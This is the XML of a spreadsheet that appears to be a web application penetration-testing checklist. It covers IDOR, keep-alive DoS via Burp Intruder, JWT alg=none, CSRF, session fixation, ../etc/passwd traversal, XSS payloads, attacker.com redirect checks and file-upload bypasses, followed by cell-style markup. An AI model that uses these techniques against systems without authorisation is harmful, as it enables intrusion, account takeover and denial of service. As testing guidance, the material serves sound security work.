    <t>The tester first needs to map out all locations in the application where user input is used to reference objects directly. For example, locations where user input is used to access a database row, a file, application pages and more. Next the tester should modify the value of the parameter used to reference objects and assess whether it is possible to retrieve objects belonging to other users or otherwise bypass authorization.
Some scenarios to test for this vulnerability
The value of a parameter is used directly to retrieve a database record
The value of a parameter is used directly to perform an operation in the system
The value of a parameter is used directly to retrieve a file system resource
The value of a parameter is used directly to access application functionality
In cases where the API/Webapp has unique IDs being used as objects we can try the below scenario too:
If the attacker's unique ID is 60b64f71adf0d3543cfd8229 and victim's unique ID is 60c30f178747147d9acd89ba then, we can craft the endpoint like this: /&lt;path&gt;/60b64f71adf0d3543cfd8229/../60c30f178747147d9acd89ba/&lt;path&gt; by just adding ../ in the API route. If on triggering the maliciously crafted request, server parses it successfully then it could lead to a successful IDOR scenario.</t>
  </si>
  <si>
    <t>Reference Link: https://blog.usamav.dev/two-account-takeover-bugs-worth-4300-dollar-bounty#heading-the-target-web-application-has-some-features-including-but-not-limited-to </t>
  </si>
  <si>
    <t>DoS due to HTTP keep-alive</t>
  </si>
  <si>
    <t>RTC WI 126853</t>
  </si>
  <si>
    <t>Server should support http1.1 and connection keep-alive</t>
  </si>
  <si>
    <t>https://blog.cloudflare.com/keepalives-considered-harmful/
https://www.nginx.com/blog/http-keepalives-and-web-performance/</t>
  </si>
  <si>
    <t xml:space="preserve">Test scenarios: 
1. Check if the application supports HTTP1.1  
2. Change the Burp Setting in Network -&gt; Connection -&gt; Timeout -&gt; Normal to 0 (So that burp doesn't close the connection on its end) 
3. By default connections are closed once we receive a response from the server.   In the request set the connection header to keep-alive  Check for the time period for which the connection is kept alive. 
4. If there is a difference of around 30 seconds in a normal request timeout and connection keep-alive timeout we can proceed with running a dos attack. 
5. Next use intruder on that specific request and open several concurrent connections to the server. 
6. If there is any delay in the responses from the server OR the application goes down. The vulnerability is exploited. </t>
  </si>
  <si>
    <t>HTTP Response Splitting</t>
  </si>
  <si>
    <t>Directory Traversal</t>
  </si>
  <si>
    <t>Direcotory Listing</t>
  </si>
  <si>
    <t>Privilege Escalation/Missing Function Level access control</t>
  </si>
  <si>
    <t>Try in URL to access the directories of the server.  www.example.com/ or www.example.com/abc/
make sure you try for /js/, /css/, /images/, /script/ which would be easier catch
Google dork for publically accessible sites: "index of" site: ibm.com</t>
  </si>
  <si>
    <t>1. Validate the response of JSON/JSONP APIs and check whether any user input is getting reflected.
2. enter the RFD payload rfd"||calc|| into the parameters which has reflection, if it is reflected back like rfd \"||calc|| , then proceed to next step.
3. If there is a Content-Disposition header, then the scenario is not exploitable. If it is not there, they try modifying the URL like below:
url_endpoint.bat
url_endpoint;setup.bat
url_endpoint/setup.bat
url_endpoint;/setup.bat
url_endpoint;/setup.bat;
url_endpoint/setup.cmd?</t>
  </si>
  <si>
    <t>check for https</t>
  </si>
  <si>
    <r>
      <t xml:space="preserve">1) </t>
    </r>
    <r>
      <rPr>
        <b/>
        <sz val="10"/>
        <color indexed="8"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">Passive &amp; Automated Scanning : </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">Install the Burp Extensions - Software Version Reporter &amp; Software Vulnerability Scanner- Make sure to enable this extension before performing Manual Crawling, Spidering &amp; Automated scanning activities.
2) </t>
    </r>
    <r>
      <rPr>
        <b/>
        <sz val="10"/>
        <color indexed="8"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">Manual Testing : </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>Check the results for both extensions in the target section. For the Software Vulnerability Scanner the results will be given with Vulnerable CVE ID's and CVSS Scoring.
Check for the Exploits source code / POC scrips related to a particular CVE ID from Exploit DB &amp; Searchsploit.
Only if the particular CVE is exploitable, you can mark the Same CVSS score given in the vulners DB, else mark the severity to be low or informational.</t>
    </r>
  </si>
  <si>
    <t>Observe each and every response headers for information about server technology, framework, components, etc.
Headers to look for:
Server:
X-Powered-By:
X-AspNet-Version:
X-AspNetMvc-Version:</t>
  </si>
  <si>
    <t>search for username, passwd, admin, root, technology, server info</t>
  </si>
  <si>
    <t>• Does a failed login indicate that the user ID is valid?             
• Can user IDs be enumerated from the Forgot Password page?   
• Can user IDs be enumerated from the Registration page? check for rate limiting?
• Test with empty credentials and without proper credentials for webapp</t>
  </si>
  <si>
    <r>
      <t>If the application has functionality like creating information in the database,  can receive information or delete information, the user should try to access these functions as another user with a different privilege to see if these functions are permitted by the new user based on his role/privilege.
Pointers:
Mass assignment- role=</t>
    </r>
    <r>
      <rPr>
        <b/>
        <sz val="10"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>noraml/admin or id=1 or 2</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">
URL Manipulation-</t>
    </r>
    <r>
      <rPr>
        <b/>
        <sz val="10"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>2 same level users - check if any dffrence in urls like id=1</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">
Parameter Tampering- 2 same level users - check if any dffrence in urls like id=1
Force Browsing
Cookie /header manipulations
Privilege Escalation: test Scenario
Check for privilege related parameter in authentication request (URL/header/cookie/body) /response (header/cookie/body) and update it with that of higher level user.
MFLAC:
Check in each request for the user specific parameter. Modify it with that of another user/higher level user.
Also try to use a cookie of lower user in higher level user's request to see if it gives a success message. Make sure to use cookie and CSRF token (if present) of the same user.
Check for js files of lower user to find exposed end points of higher levels.</t>
    </r>
  </si>
  <si>
    <t>check HTTPS to HTTP</t>
  </si>
  <si>
    <t>Search for server details
Site:desidelight.com</t>
  </si>
  <si>
    <t>site:*.https://juice-shop.herokuapp.com/#/search</t>
  </si>
  <si>
    <t>search for username, passwd, admin, root, technology, server info from page source</t>
  </si>
  <si>
    <t>GET /config
GET /robots.txt
GET /crossdomoin.xml</t>
  </si>
  <si>
    <t>check with given details in GET method
check at start of GET method
Search for endpoint:
GET /keys
GET /tokens
GET /configuration</t>
  </si>
  <si>
    <t>applictn&gt;
multifactor&gt;capta&gt;login with gmail(SSO)
check for login functionality</t>
  </si>
  <si>
    <t>Search for 400 nd 500 responses for any stack traces.</t>
  </si>
  <si>
    <t>check with given details in GET method
check at start of GET method
Ex:
GET /old
GET /backup</t>
  </si>
  <si>
    <t>Actual resuest is 
POST /desidelight.com
Try for OPTIONS/ desideligh.com
TRACE /desidelight.com
HEAD /desidelight</t>
  </si>
  <si>
    <t>Search for deafault user names and passwords list in github
Try with user name and password list</t>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color rgb="FF002060"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>• Is SSL enabled? Try forcing the request over an unencrypted connection.- check for HTTPS to HTTP</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color rgb="FFFF0000"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">
</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color rgb="FF002060"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>• Is the hint question weak?</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">
</t>
    </r>
    <r>
      <rPr>
        <b/>
        <sz val="10"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>•</t>
    </r>
    <r>
      <rPr>
        <b/>
        <sz val="10"/>
        <color rgb="FFFF0000"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve"> I</t>
    </r>
    <r>
      <rPr>
        <b/>
        <i/>
        <sz val="10"/>
        <color rgb="FFFF0000"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>s the password sent or shown as plaintext</t>
    </r>
    <r>
      <rPr>
        <b/>
        <sz val="10"/>
        <color rgb="FFFF0000"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>?</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color rgb="FFFF0000"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">
</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">• Is the token in the link random?--&gt;passwd reset
• Does the token expire after a certain time?
• Is the token invalidated after one use?
</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color rgb="FF002060"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>• Can a locked user ID be unlocked using an SSL-protected password link?- try to lock the account by giving wrong passwd and then try to reset the passwd</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">
• Try to login with same creds in 2 differnt browsers. reset passwd in one browsera nd check the other browser is logged out automatically
• Is the user account gets locked or password becomes unusable on initiating the forgot password action i.e. just by submitting the email id or username?</t>
    </r>
  </si>
  <si>
    <t xml:space="preserve">1. Check if the url is in HTTP or HTTPS. If in HTTPS check in HTTP. Try in both browser and burp
2) Is the user account gets locked or password becomes unusable on initiating the forgot password action i.e. just by submitting the email id or username?
Passwd reset should not work  after account getting blocked
</t>
  </si>
  <si>
    <r>
      <t xml:space="preserve">• Check for Deep URL without logging in (forced browsing)      
• Submit an additional username parameter at the Change Password page using the same variable found in the username field on the Login page.
• Submit an additional username parameter at the Reset Password page using the same variable found in the username field on the Login page.         
• Submit a partial password and check whether the application accepts it.
• Is Logout functionality implemented on the application?   - logout button        
</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color rgb="FFFF0000"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>• Parameter manipulation in the login request/response.  </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t> </t>
    </r>
  </si>
  <si>
    <t>While doing passwd change:
1) Try by adding 2 username fields
2) Try by chging existing username with other usrname.
3) If it is asking for old passwd try to remove the entire old passwd filed and check whethr it is accepting or not.
• Parameter manipulation in the login request/response.
Check for any paramenter/header in which it is explicitly mentiond if the user is logged in or not
Ex: is logged = true /false in the request
Change the parameter to see if we can bypass the authentication by removing the user name or passed field.   
If you have any jwt token-decode it by using
header
payload
signature</t>
  </si>
  <si>
    <t>Try to access diffrnt files which are not available for us:
GET /config
GET /root
Look for .js files in burp suite(  from target) and try to modify the file name and access it.</t>
  </si>
  <si>
    <r>
      <t>1) Login with admin user and normal user and check the differences.(Admin has user has 5 functionalities and normal user has 3 functionlities) . Try to access admin user additional functionalities with normal user by changing the url.
2) If this functionality doesnt show explicitly in URL then observe chnges in the burp request. Modify normal user request to access admin functionality
3)Login to the application as normal/admin user and intercept the request, observe the multiple request which are part of login and compare  normal user login request with admin user request. Try to modify noraml user request based on the comparison to get admin user access. (</t>
    </r>
    <r>
      <rPr>
        <b/>
        <sz val="10"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>Goal</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>: By using this, we might get access to whole admin functionality)
4)Check for any paramater which is explicitily showing if it is an admin user or normal user (check this in whole request)  (</t>
    </r>
    <r>
      <rPr>
        <b/>
        <sz val="10"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>Goal</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">: By using this, It will affect any particular functionality)
 ex: role =admin or isadmin=true
</t>
    </r>
  </si>
  <si>
    <t xml:space="preserve">1) Look for any id which is assigned to particular user.
2) By simply modfying the id, we can view other's information
Ex: User_id =123
It can be any id which is guessable.
Ex:Price details
</t>
  </si>
  <si>
    <t xml:space="preserve">• Are all Set-Cookie directives tagged as Secure?
• Do any Cookie operations take place over unencrypted transport?url inHTPPS-HTTP
• Can the Cookie be forced over unencrypted transport?-Cookie check box s
• If so, how does the application maintain security?
• Are any Cookies persistent?--is it sensitive?--check for session cookie.expiry time and date.
• What Expires= times are used on persistent cookies, and are they reasonable?•
• Check for domain, path attaributes-if the application resides on server app.mysite.com, then it should be set to “; domain=app.mysite.com” and NOT “; domain=.mysite.com”                                                            
• Check for path. If the application resides at /myapp/, then verify that the cookies path is set to “; path=/myapp/” and NOT “; path=/” or “; path=/myapp”.  </t>
  </si>
  <si>
    <r>
      <t xml:space="preserve">
Secure:HTTPS-HTTP
HTTP only--when we try to search with &lt; script&gt; alert(documet.cookie)&lt;/ script&gt; we don’t get cookie in the alert box.
1) If cookie is not tagged as Secure, Cookie values will also be sent in HTTP 
If cookie is tagged as Secure, even if the request is sent in HTTP, cokkie will be sent in encrypted format (HTTPS).
2) If we logout the application, cookie should be expired. but if the cookie is persisent even if we logout it will expire at the mentioned time.
SESSION COOKIE cannot be a persistent cookie
3)Check that application should be accessible for only mentiined DOMAIN.
Ideally path should not be root (/). It should be /admin (/something)
* If </t>
    </r>
    <r>
      <rPr>
        <b/>
        <sz val="10"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>HTTP only</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve"> flag is set then we cannnot grab the cookie information using java script.
Ex: &lt;script&gt; alert( document.cookie) &lt;/script&gt;
* If </t>
    </r>
    <r>
      <rPr>
        <b/>
        <sz val="10"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">Session only -  It </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>will be session cookie or not</t>
    </r>
    <r>
      <rPr>
        <b/>
        <sz val="10"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">.
</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">
</t>
    </r>
  </si>
  <si>
    <t>** If session is handled by cookies then CSRF is likely possible bcz cookies are part of browser. Cookies will append to forged request**
1)Perform state changing actions (create) which is post request
2)Generate CSRF POC (.html code)
3)Make necessary changes in .html code and send it to the user2.
4)When user2 opens the .html code (prerequisite: user2 should be logged into the application). As appliction session handles by cookies, browser will send user2 cookies as a part of .html code execution.
5)In this way, user2 will be tricked and performs unintentional action on behalf of user1.</t>
  </si>
  <si>
    <t>Check session time out is implemented or not.</t>
  </si>
  <si>
    <t>* Sturucture of JWT token
Head, paylaod and signature.
1)Remove signature and check if the request is working.
2)Change alg=NONE and then recheck
3)compare  jwt tokens of 2 diffent users and observe the changes. Modify user1 jwt token according to user2( change if user id presents or role presents). Try to see whether modified jwt token is working or not.</t>
  </si>
  <si>
    <t>look for 400, 500 status codes.
Give input which is not expected to get 400/500 error
Check which value is restricting in the application
Ex:If any filed expects numbers or alpha numerics try to bypass that restriction by giving special characters</t>
  </si>
  <si>
    <t>Seach in Request and Response.
jession id- java
ASP.Net_SessionID - .NET Framework
PHPSESSID – PHP</t>
  </si>
  <si>
    <t>Give input which is not expected to get 400/500 error
Observe the response of 400, 500 status code
Technology info is available in the responses.</t>
  </si>
  <si>
    <t>pagesouce&gt;scrpt&gt;check for tech info
Search for JQuery, Google Analytic, Backbone, Dojo, Underscore, etc
Search in burp suite as well.</t>
  </si>
  <si>
    <t xml:space="preserve">
Use Wapalyzer to get server information
Look for any header which releavs server info. Ex: X-forwarded:
Look for headers in 400/500 responses to get any details of server info or versions.
Check for vulnerabilities
Ex:Check for Apache Tomcat/7.0.92 vulenrabilities
</t>
  </si>
  <si>
    <t>Search for HSTS  in the response
If from HTTPS to HTTP is given then it will rediect to HTTPS only.</t>
  </si>
  <si>
    <t xml:space="preserve">Look for 302/301 (Redirection) responses in the applictn
Change HOST header in request to malicicous site.
Host: attacker.com
Look if it redicteting to attacker.com nor not.
Along with 302/301(Redirection) perform this test case in password reset, forgot password functionality.
 </t>
  </si>
  <si>
    <t xml:space="preserve">
Search for jquery, apache, tomcat, java, php in burp suite.
Use Wapalyzer to get server inforamtion
Look for any header which reveals server info. Ex: X-forwarded:
Look for headers in 400/500 responses to get any details of server info or versions.
Check for vulnerabilities
Ex:Check for Apache Tomcat/7.0.92 vulenrabilities
</t>
  </si>
  <si>
    <t xml:space="preserve">How to bypass client side validation:
1)Give all corect details and send the request to burp and change the details in the burp intercept.
2)Try with dffent user id in both registration page, forgot passwd page and  login page if it is showing generic error or User id Error
3)Try to look for Error msg which is showing user is existing then it is called Account Enumeartion
</t>
  </si>
  <si>
    <t xml:space="preserve">Try from both sides(client and server) from browser and burp
1. Observe the password policy and check which input it is expecting and bypass the value. </t>
  </si>
  <si>
    <r>
      <t xml:space="preserve">• Can user IDs be enumerated from the Registration page?    
• Does the application lock out user account after 3 to 5 failed login attempts?
</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color rgb="FFFF0000"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">• Is there a CAPTCHA implemented to prevent against automated  bruteforce attacks?  </t>
    </r>
  </si>
  <si>
    <t>If a captcha is implemented check if we can bypass that captcha value from the request.
Ex:isreturned: true</t>
  </si>
  <si>
    <t xml:space="preserve">
Try to look for any files in the applictn (burp suite--&gt; traget)
Modify the file name  and access it.
Try with ../ payload and observe the response (try to see how the application is processing  ../ payload, check whether it is accepting ../ or modifying ../ to any other form.
If it is accepting ../ try to access etc/passwd file by using ../ payload
Ex: GET /../etc/passwd
GET /../../etc/passwd
trial nd error method
Try for this vulnerability in File uplaod and view files functionlity (and seach in other functionalities as weel)</t>
  </si>
  <si>
    <t xml:space="preserve">1) Check if cookie is present before login.
2)After login check if the same  cookies (Step 1) is present.
Steps:
1) Access the application URL and note down cookies before login.
2)Send the cookies to  user2 and trick the user2 to login.
3)Once user2 logins, then user2 session will be assigned with the shared  cookies(Step2).
4) As user1 have the cookies already, he can access user2 information by using those cookies.
</t>
  </si>
  <si>
    <t xml:space="preserve">1)Check the session id when the request is going in HTTPS and HTTP.
2) Is session id saved in browser cache- If it is stored then any one can see session id information in the browser (about:cache) in firefox.
3)Check if SESSION id is part of GET request (bookmark or if it is stored in cache) anybody can view. 
4) Convert POST request to GET and check whether session id is part of URL.
</t>
  </si>
  <si>
    <t>1)Decode the session ID's in base64 and try to change usernae of passwd.
2)Check the session id which is not static nd try to change the session 
3)Validate the token by taking it partially
4)check the session is based on user name or email length from login page
* Check if the sessiod is expired after logout.
Check if SESSION ID's are randomly generated and not guessable by anyone</t>
  </si>
  <si>
    <t>1)Logout functionlity should be available.
4)Login--&gt;Visit diffent pages and then logout.--&gt;click back button then check if it navigate to login page oo able to access other pages directly with out login. If yes, report.
6) If the session time is 15 mins, let it logout by keeping it idle and then perform the login request with same session id.
7) Login gmail and try to login dd application as login with gmail(SSO). Logout gmail and dd should logout.
8)Login and logout and try to send previous req with old cookies in burp, see whether old cookies are working after logout
Expiry date, login time--&gt;Change cookie expiration time in cookie editor and observe whether cookies are valid till new expiration time, usually cokkie expiration should not be hadled by us.
If cookies have expiration time irrespective of that it should expire upon logout</t>
  </si>
  <si>
    <t>1. For each request in testing idendtify the input parameters, which responds back the value of it in HTTP response
2. Identify set of characters which is not getting encoded in response (Sample Input: `';!--"&lt;XSS&gt;=&amp;{()})
3. Identify where input is getting reflected in response (Inside Script/CSS, Inside Value of input tag, Inside comments, Plain HTML, etc.)
4. Construct the payload script using non-encoded characters in response with respect to its place in response.
(Ex: If value is inside input tag value, the payload would be something like: “&gt;&lt;script&gt;alert(1)&lt;/script&gt;
Or if its inside application script and &gt;&lt; are encoded, then: '; alert(1); // )</t>
  </si>
  <si>
    <t>1)Look for Input field.( search fiels, create, update etc ) perform  action.
Look for the input payload in response
Ex: abc is given in input to create. 
Abc created is shown in response
XSS is applicable when input data is shown in response.
2) Observe is there any input validations placed.
Ex: Try for &lt;script&gt;alert(1)&lt;/script&gt;.and observe how it is showing in the response.
3)If application encodes/decoder special characters then provide reverse format of encoding/decoding.
4)Observe input validations by looking at your inpdata in response. 
Based on the input data in response modify the payloads.</t>
  </si>
  <si>
    <t>Same as Reflected XSS but observe, whether the input inforamtion is storing somewhere in the application</t>
  </si>
  <si>
    <t xml:space="preserve">Scenarios:
1)Login to any restaurant application and order few items.
2)While ordering observe the body parameters, if discounts field is not presnt try to add discount parameter in the request. Validate if it applies or not.
* While doing the payment it is observed that we have discount codes of 20% and 25%. 
But, it is allowing us to add only one promo code.
When we observe the post req, we can see that promo code present in body paramenters. 
Add one more field of promo code and observe whether it is taking both the promo codes or not. </t>
  </si>
  <si>
    <t>1. Observe the requests and 302 responses
2. Identify the parameters which are responsible for redirection.
Ex:GET /menu?url=https://dd.com/orders
Now change the URL parameter to attacker.com
3. Look for the parameters which are responsible for redirection in all the req with in the application.
4. Application is vulnerable if its redirecting to above malicious site</t>
  </si>
  <si>
    <t xml:space="preserve">
1)Look for File restrictions in the application and try to byass that.
Ex:If the application supports only jpg file try to upload .php or .html file from client side.
2) Send the file upload request to burp intercept and bypass the request by changing the file type
.
3)If application is not accepting other files then try to change the content of the file.
Ex: If application accepts only jpg file then upload jpg file and capture the request in burp suite and in the post body add scrpt payload (&lt;script&gt;alert(1)&lt;/script&gt;) and observe the response. 
4)Change the name of the file.
Ex: Change the file to script tag in burp request.
&lt;script&gt;alert(1)&lt;/script&gt;.jpg
5) Observe is there any validation on size of the file and upload the file with larger data size.</t>
  </si>
  <si>
    <t>1) Observe is there any hidden fields when we are creating, updating or accessing the application.
2) Modify hidden field values and observe the response
Ex: While creating a user in the UI we can see FN, LN and email id but when we observe the same req in burp we can see additional parameter role. Try to change the role param and observe the how the applictn is responding.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</si>
</sst>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name val="Arial"/>
      <family val="2"/>
    </font>
    <font>
      <b/>
      <sz val="10"/>
      <name val="Arial"/>
      <family val="2"/>
    </font>
    <font>
      <u/>
      <sz val="10"/>
      <color indexed="30"/>
      <name val="Arial"/>
      <family val="2"/>
    </font>
    <font>
      <b/>
      <sz val="11"/>
      <name val="Arial"/>
      <family val="2"/>
    </font>
    <font>
      <sz val="10.5"/>
      <name val="Arial"/>
      <family val="2"/>
    </font>
    <font>
      <b/>
      <sz val="12"/>
      <name val="Arial"/>
      <family val="2"/>
    </font>
    <font>
      <sz val="10"/>
      <color indexed="12"/>
      <name val="Arial"/>
      <family val="2"/>
    </font>
    <font>
      <sz val="10"/>
      <name val="Arial"/>
      <family val="2"/>
      <charset val="1"/>
    </font>
    <font>
      <sz val="9"/>
      <name val="Titillium-Regular"/>
    </font>
    <font>
      <sz val="9"/>
      <name val="Arial"/>
      <family val="2"/>
      <charset val="1"/>
    </font>
    <font>
      <sz val="9"/>
      <name val="Titillium-Regular"/>
      <family val="2"/>
    </font>
    <font>
      <sz val="9"/>
      <name val="Titillium-Regular"/>
      <family val="2"/>
      <charset val="136"/>
    </font>
    <font>
      <b/>
      <sz val="9"/>
      <name val="Titillium-Bold"/>
      <family val="2"/>
    </font>
    <font>
      <b/>
      <sz val="10"/>
      <color indexed="8"/>
      <name val="Arial"/>
      <family val="2"/>
    </font>
    <font>
      <sz val="10"/>
      <color indexed="8"/>
      <name val="Arial"/>
      <family val="2"/>
    </font>
    <font>
      <b/>
      <sz val="9"/>
      <color indexed="21"/>
      <name val="Titillium-Bold"/>
    </font>
    <font>
      <sz val="9"/>
      <color indexed="21"/>
      <name val="Titillium-Regular"/>
      <family val="2"/>
    </font>
    <font>
      <sz val="9"/>
      <name val="Arial"/>
      <family val="2"/>
    </font>
    <font>
      <sz val="10.5"/>
      <color indexed="12"/>
      <name val="Arial"/>
      <family val="2"/>
    </font>
    <font>
      <b/>
      <sz val="10"/>
      <color indexed="8"/>
      <name val="Calibri"/>
      <family val="2"/>
    </font>
    <font>
      <sz val="10"/>
      <name val="Titillium-Regular"/>
    </font>
    <font>
      <i/>
      <sz val="10"/>
      <color indexed="12"/>
      <name val="Arial"/>
      <family val="1"/>
    </font>
    <font>
      <i/>
      <sz val="10"/>
      <color indexed="8"/>
      <name val="Arial"/>
      <family val="1"/>
    </font>
    <font>
      <sz val="10"/>
      <name val="Calibri"/>
      <family val="2"/>
      <scheme val="minor"/>
    </font>
    <font>
      <i/>
      <sz val="10"/>
      <name val="Arial"/>
      <family val="2"/>
    </font>
    <font>
      <u/>
      <sz val="10"/>
      <name val="Arial"/>
      <family val="2"/>
    </font>
    <font>
      <sz val="12"/>
      <color rgb="FF9C5700"/>
      <name val="Calibri"/>
      <family val="2"/>
      <scheme val="minor"/>
    </font>
    <font>
      <b/>
      <sz val="12"/>
      <name val="Calibri"/>
      <family val="2"/>
      <scheme val="minor"/>
    </font>
    <font>
      <b/>
      <sz val="11"/>
      <color theme="1"/>
      <name val="Calibri"/>
      <family val="2"/>
      <scheme val="minor"/>
    </font>
    <font>
      <b/>
      <sz val="9"/>
      <color rgb="FF000000"/>
      <name val="Tahoma"/>
      <family val="2"/>
    </font>
    <font>
      <sz val="9"/>
      <color rgb="FF000000"/>
      <name val="Tahoma"/>
      <family val="2"/>
    </font>
    <font>
      <b/>
      <sz val="10.5"/>
      <name val="Arial"/>
      <family val="2"/>
    </font>
    <font>
      <b/>
      <sz val="14"/>
      <name val="Arial"/>
      <family val="2"/>
    </font>
    <font>
      <sz val="14"/>
      <name val="Arial"/>
      <family val="2"/>
    </font>
    <font>
      <sz val="12"/>
      <name val="Arial"/>
      <family val="2"/>
    </font>
    <font>
      <sz val="10"/>
      <color rgb="FFFF0000"/>
      <name val="Arial"/>
      <family val="2"/>
    </font>
    <font>
      <sz val="10.5"/>
      <color theme="1"/>
      <name val="Arial"/>
      <family val="2"/>
    </font>
    <font>
      <sz val="10"/>
      <color rgb="FF002060"/>
      <name val="Arial"/>
      <family val="2"/>
    </font>
    <font>
      <b/>
      <sz val="10"/>
      <color rgb="FFFF0000"/>
      <name val="Arial"/>
      <family val="2"/>
    </font>
    <font>
      <b/>
      <i/>
      <sz val="10"/>
      <color rgb="FFFF0000"/>
      <name val="Arial"/>
      <family val="2"/>
    </font>
  </fonts>
  <fills count="11">
    <fill>
      <patternFill patternType="none"/>
    </fill>
    <fill>
      <patternFill patternType="gray125"/>
    </fill>
    <fill>
      <patternFill patternType="solid">
        <fgColor indexed="22"/>
        <bgColor indexed="31"/>
      </patternFill>
    </fill>
    <fill>
      <patternFill patternType="solid">
        <fgColor indexed="43"/>
        <bgColor indexed="26"/>
      </patternFill>
    </fill>
    <fill>
      <patternFill patternType="solid">
        <fgColor indexed="9"/>
        <bgColor indexed="26"/>
      </patternFill>
    </fill>
    <fill>
      <patternFill patternType="solid">
        <fgColor theme="4" tint="0.59999389629810485"/>
        <bgColor indexed="64"/>
      </patternFill>
    </fill>
    <fill>
      <patternFill patternType="solid">
        <fgColor theme="7" tint="0.59999389629810485"/>
        <bgColor indexed="12"/>
      </patternFill>
    </fill>
    <fill>
      <patternFill patternType="solid">
        <fgColor rgb="FFFFEB9C"/>
      </patternFill>
    </fill>
    <fill>
      <patternFill patternType="solid">
        <fgColor rgb="FFFFFF00"/>
        <bgColor indexed="64"/>
      </patternFill>
    </fill>
    <fill>
      <patternFill patternType="solid">
        <fgColor rgb="FFE2EFDA"/>
        <bgColor indexed="64"/>
      </patternFill>
    </fill>
    <fill>
      <patternFill patternType="solid">
        <fgColor rgb="FFFF0000"/>
        <bgColor indexed="64"/>
      </patternFill>
    </fill>
  </fills>
  <borders count="10">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8"/>
      </top>
      <bottom/>
      <diagonal/>
    </border>
  </borders>
  <cellStyleXfs count="3">
    <xf numFmtId="0" fontId="0" fillId="0" borderId="0"/>
    <xf numFmtId="0" fontId="2" fillId="0" borderId="0" applyNumberFormat="0" applyFill="0" applyBorder="0" applyAlignment="0" applyProtection="0"/>
    <xf numFmtId="0" fontId="26" fillId="7" borderId="0" applyNumberFormat="0" applyBorder="0" applyAlignment="0" applyProtection="0"/>
  </cellStyleXfs>
  <cellXfs count="97">
    <xf numFmtId="0" fontId="0" fillId="0" borderId="0" xfId="0"/>
    <xf numFmtId="0" fontId="0" fillId="0" borderId="0" xfId="0" applyAlignment="1">
      <alignment wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="0" fillId="2" borderId="0" xfId="0" applyFill="1" applyAlignment="1">
      <alignment wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="3" fillId="0" borderId="0" xfId="0" applyFont="1" applyAlignment="1">
      <alignment wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="4" fillId="0" borderId="0" xfId="0" applyFont="1" applyAlignment="1">
      <alignment wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="3" fillId="2" borderId="0" xfId="0" applyFont="1" applyFill="1" applyAlignment="1">
      <alignment wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="4" fillId="2" borderId="0" xfId="0" applyFont="1" applyFill="1" applyAlignment="1">
      <alignment wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="3" fillId="0" borderId="1" xfId="0" applyFont="1" applyBorder="1" applyAlignment="1">
      <alignment wrapText="1"/>
    </xf>
